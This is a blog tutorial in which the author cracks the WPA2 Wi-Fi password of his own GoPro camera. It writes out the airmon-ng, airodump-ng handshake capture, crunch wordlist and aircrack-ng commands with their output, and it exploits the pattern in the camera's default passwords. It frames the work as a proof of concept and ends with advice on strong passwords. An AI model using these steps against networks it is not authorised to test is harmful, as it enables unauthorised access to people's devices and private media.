Thanos Stantzouris
Posted on December 28, 2020
In this article, I am going to give to you the entire process of Hacking a GoPro Silver 7 (Which I own). Why? Why not? I say.
Every hacking adventure is an adventure full of practice and fun techniques in action, every time you try to hack or crack a device you get to learn something new and gain only pure XP (Experience Points) on the matter.
The History behind the Hack
It was a plain classic Friday, and I was on a hacker's high, I just wanted to find something interesting to do, I start gazing around my room when suddenly out of nowhere there it was, my GoPro Silver 7, standing alone exactly at the same place it was 4 months ago. It was waiting for me, like a loyal Labrador Retriever... Quiet touching... Quiet touching indeed... And then the idea hit me! I am gonna hack this shit.
I grab my Wireless Adapter I fire up my laptop, open up my Kali virtual box, then I grab my phone, start scrolling down Reddit, see a cute puppy, then I get on a conversation about the last season of Silicon Valley, 2 hours passed by like a breeze and then I remembered.
Wasn't I suppose to be hacking My GoPro? hehe... π
So I got back to Work!
TL;DR: I am going to be cracking my GoPro's built-in Wireless Network and find the Password with the help of:
- Kali Linux Virtual Machine with Tp-Link (TL-WN722N) Wireless Adapter or Alfa AWUS036NHA High Gain Wireless Adapter
- Aircrack-ng Cracking Suite (Aircrack in movies)
- Crunch (Pre-installed on Kali Wordlist Generator)
Disclaimer: All the Hacking in this Article took place on devices that I own. Do not hack other people unless you have their WRITTEN Permissions! Ok, that is out of the way now.
1. Reconnaisance
Like it or not when you embark on a new hacking adventure you always need to scribble down some notes first.
Whatever you may believe that it can be proven useful along the way.
My Notes:
- GoPro Model: Silver 7 GoPro
- Name: StantzGoPro GoPro
- Password Type: WPA2 GoPro
- Password: myGoPro123
And then it hit me. My password is weaker than freaking SpongeBob! But why? I always put super complicated passwords that even I do not remember. Why did I commit this Security crime? The answer is simple, boredom, and ignorance. π
So I reset the network settings and the new info I got was:
- GoPro Default Name: GP24514525
- GoPro Default Password: Zp2-4Vy-cBp
Ok, that's a random password but that dash (-) on the 4th and 8th password slot may not be that random. So I reset the wireless options 29 more times!
The results:
- GoPro Silver 7 has a random wpa2 generated password on every reset with a form of 11 characters with mixed alphanumerics and ALWAYS has dashes on the 4th and 8th slot. @@@-@@@-@@@ β¬ Like This.
- The Dash NEVER changes position.
- There was no occurrence of two numbers side by side (22g) β¬ This never happened, (63f) β¬ This never happened, (281) β¬ This never happened.
- There was no occurrence of three same letters side by side. (mmm) β¬ This never happened.
That is a pretty scary password still, even if you put all the rules in the equation! But where there is a pattern, there is a case.
Did you know that you can rent an Nvidia Tesla K80βββa GPU with 4992 cores from AWS for 0.90$/hour? You can run Hashcat on that thing and try 3 trillion hashes per hour.
Size matters...
But you know what? I know that this Default GoPro password is strong and I still changed it! Do you want to know why? Because I have one camera but many other devices, I want the password to be an easy one to remember as I want to put it on my phone, and on my Laptop, and on my Desktop, and on my Smart Fridge, I don't know.
Imagine having to put Zp2-4Vy-cBp every time. And also! Who would hack my GoPro man? That is so random! So why the strong password? I bet that this was my train of thought back then when I bought it and set it up for the first time.
Ok, I think that's enough Recon for this hack. Let's proceed to network scanning to Find our target.
2. Locking Network Target with Airckrack-ng and grabbing 4-way handshake
That's the cool part of the hacking adventure! Let's fire up the good ol' Kali Linux VM and connect the Wireless Card!
I use this baby for this hack: Tp-Link (TL-WN722N) Wireless Adapter.
When everything is connected run iwconfig on a terminal for a status check.
root@kali:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
If you get this result then everything is all fine and dandy as the British say. (I googled that).
Now the wireless card mode needs to change from managed to monitor. This is a crucial part. I bought this wireless card because I knew that it could work like a champ! But now TP-LINK has updated the versions and some new TL-WN722N cards don't work so...
You should buy an Alpha Card just to be sure. Alfa AWUS036NHA High Gain Wireless Adapter,
This one is my favorite because it just works like a charm!
Putting the card to monitor mode
root@kali:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
476 NetworkManager
941 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
Next step, sniffing out for networks with Airodump-ng
root@kali:~# airodump-ng wlan0mon
CH 2 ][ Elapsed: 3 mins ][ 2020-11-12 15:51
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
06:41:69:94:C5:8D -26 13 0 0 0 11 65 WPA2 CCMP PSK GP24514525
**:**:**:**:**:** -87 2 0 0 1 270 WPA2 CCMP PSK C******-**2591
**:**:**:**:**:** -46 13 211 0 2 270 WPA CCMP PSK H*****n
**:**:**:**:**:** -59 6 0 0 1 130 WPA2 CCMP PSK C*****A
**:**:**:**:**:** -66 7 9 0 11 130 WPA2 CCMP PSK *****le*
**:**:**:**:**:** -77 3 1 0 1 65 WPA2 CCMP PSK CY*****B
**:**:**:**:**:** -80 2 0 0 7 270 OPN CO*******n
**:**:**:**:**:** -80 3 0 0 7 270 WPA2 CCMP PSK ******4403001
**:**:**:**:**:** -80 4 0 0 8 130 WPA2 CCMP PSK W*****522
**:**:**:**:**:** -78 3 0 0 7 130 WPA2 CCMP PSK ****D_BF2EF0
**:**:**:**:**:** -88 4 0 0 13 130 WPA2 CCMP PSK ****CVDW-982
These results represent all the networks that surround my wireless card, and I am only interested in the first one, which represents the Wi-Fi Network of my GoPro.
I put stars on the BSSIDs as the greatest of Lads of Reddit noted that People who are good with OSINT Techniques can locate people with Wigle.
HOW COOL AND SCARY IS THAT. π±βπ»π±βπ€
If I hadn't reset my GoPro then under the ESSID column you would see a StantzGoPro. A dead give away of the kind of the device.
A bit of detail here:
- BSSID: 06:41:69:94:C5:8D
- CH (channel): 11
- ENC: WPA2
- ESSID:GP24514525
These few details you should always write down. They keep on finding their way on future commands, like the next one:
airodump-ng --bssid 06:41:69:94:C5:8D -c 11 wlan0mon -w Desktop/WPA_Hacks/goPro/goPro
With this command we order our wireless card to only listen to a specific channel and to a specific device, and also write down every result it may capture on Desktop/WPA_Hacks/goPro/gopro.
By doing this we are trying to capture the 4-Way Handshake between a device and the GoPro WiFi.
root@kali:~# airodump-ng --bssid 06:41:69:94:C5:8D -c 11 wlan0mon -w Desktop/WPA_Hacks/goPro/goPro
CH 11 ][ Elapsed: 48 s ][ 2020-11-12 16:00 ][ WPA handshake: 06:41:69:94:C5:8D
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
06:41:69:94:C5:8D -20 36 77 4 0 11 65 WPA2 CCMP PSK GP24514525
BSSID STATION PWR Rate Lost Frames Notes Probes
06:41:69:94:C5:8D 42:E7:EC:D6:05:DE -14 1e- 1e 0 5724 EAPOL GP24514525
To capture a Handshake a user has to be online and interacting with the camera, which is really possible because if you find a GoPro Network somewhere around, it means that someone has to be either connected or about to connect.
If a GoPro is off, then its Wi-Fi is not broadcasting. Simple as that.
Once you capture the Handshake the only thing that remains is the Handshake cracking!
Carving the Dictionary
Now that we have the password hidden and encrypted we need a smart Dictionary to find the Password.
We'll be using the tool Crunch to create a smart Dictionary.
Crunch is a Wordlist generator tool that is coming pre-installed with Kali Linux out of the box. Mastering this tool is of the essence when you wish to crack a Hashed Password.
You could always go the Bruteforcing way but you should always leave that technique as a hail mary.
Based on what I realized about the GoPro password I could Generate a Wordlist that would most definitely contain the password with this command:
root@kali:~# crunch 11 11 -t @@@-@@@-@@@ -d 2@ -d 1% -f /usr/share/rainbowcrack/charset.txt mixalpha-numeric -o Desktop/wordlist.txt
This command tells crunch to:
- 11 11: Create an Eleven character long string.
- -t: Specifies a pattern, eg: @@god@@@@ where only the @'s, ,'s, %'s, and ^'s will change. So everything except the ( - ) will change.
- -d 2@ -d 1%: Limit the number of duplication you want to get in your password. Ex, Let aa happen but no aaa, and 11 will never happen.
- -f: Using a charset for the generated password. Because we want the possible characters to be both lowercase and Uppercase and we also want numbers in there then we have to go with mixalpha-numeric.
- -o: Save the output to wordlist.txt on the Desktop directory.
These parameters with crunch would create a Dictionary containing our target's password. But there is a slight, little, tiny problem...
root@kali:~# crunch 11 11 -t @@@-@@@-@@@ -d 2@ -d 1% -f /usr/share/rainbowcrack/charset.txt mixalpha-numeric -o Desktop/wordlist.txt
Crunch will now generate the following amount of data: 162318293407261152 bytes
154798787505 MB
151170690 GB
147627 TB
144 PB
Crunch will now generate the following number of lines: 13526524450605096
The output would be H U G E. π€―
But for the sake of the Proof of Concept (PoC) let's demonstrate the Dictionary attack.
Note to the future: If you are watching this in 2030, 144 PB was a lot of Data back in the Covid Crisis! So Good for you! You can crack wpa2 passwords easily! Congrats ππ₯
If we go through with Crunch we would eventually have a list like the following in our hands.
zp2-4vy-cBp
2r6-cnj-Xky
w4f-ceb-DC2
gbs-24d-cas
23H-wec-dv3
P6C-PRt-hrK
Yn9-Cr6-Ybm
s5p-WWN-6n2
HSM-v4Q-khn
CCW-VkJ-FuJ
Pub-bMw-chn
9vm-WJN-Vf3
9vm-wjn-Vf3
9vm-wJn-Vf3
9vm-wjN-Vf3
9vm-wJN-Vf3
9vm-Wjn-Vf3
wrj-hD5-4hZ
k6Z-wjz-mtS
3nk-Ncj-cf9
Rnk-PRt-h1k
Let's use this Dictionary to prove a point
The Dictionary attack The Aircrack-ng command for the attack and the results are:
root@kali:~# aircrack-ng Desktop/WPA_Hacks/goPro/goPro-01.cap -w Desktop/gopro.txt
Reading packets, please wait...
Opening Desktop/WPA_Hacks/goPro/goPro-01.cap
Read 20985 packets.
# BSSID ESSID Encryption
1 06:41:69:94:C5:8D GP24514525 WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening Desktop/WPA_Hacks/goPro/goPro-01.cap
Read 20985 packets.
1 potential targets
Aircrack-ng 1.6
[00:00:00] 19/21 keys tested (940.87 k/s)
Time left: 0 seconds 90.48%
KEY FOUND! [ 9vm-WJN-Vf3 ]
Master Key : DD 1D A3 87 9C D5 DF A5 A9 77 D5 EC 35 D4 C6 C3
03 1D F9 4E 6E 03 90 92 41 40 BA 4E FE 2A 92 72
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : C1 BF EF A3 22 02 9F 4B 19 4C 1B 9C B6 0D EA 1A
Dope feeling man. Dope the least.
4. Bonus! Wordlist Creation
Ok, everything went perfectly thus far. But what would have happened if instead of GP24514525 the name was StantzGoPro?
That takes us to an entirely different way of approaching this Dictionary thing.
What I am thinking is "Since he has changed the name, there is NO way in hell that he left that ugly password as default. NO way!
Here is a thought, he didn't entirely change the name. He kept the word "GoPro" inside so he may use it again in his password. and GoPro is 5 letters, and an acceptable wpa2 password is 8 characters. Good.
Let's build a cool Dictionary to hack StantzGoPro
*Simple Wordlist:
crunch 14 14 -t StantzGoPro%%% goPro-simple-wl.txt
This command will create for you a list starting from StantzGoPro000 and finish at StantzGoPro999.
Pretty simple but powerful if you work with it more. As I said earlier Crunch is a must. Password cracking is not easy, but is Hacking easy? π€
Conclusion
Cracking a GoPro password is totally possible, and you can probably understand the danger and how it can expose all the images and 4k videos stored in the camera to people with malicious intent. Keep your Passwords strong. And store them in a password manager like LastPass. It will make your life easier and hackers' lives a lot more difficult.
Password cracking is an art, it needs attention to detail, a critical way of thinking, and most definitely some good, old fashioned trial and error sprinkled with some dazzling patience.
There are many roads to take and many more books to read. I created this Article - Tutorial - PoC or however you like to call it just to give out something new to the community. I will create a more in-depth article about password cracking and much more real-life hacking PoCs like this one including Phishing, more Wi-Fi hacking, and pretty much whatever spikes my interest at that point. If what you just read feels a bit... advanced, you should also take a look at my other articles on my blog Sudorealm:
β Support this Nerd
Posted on December 28, 2020
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.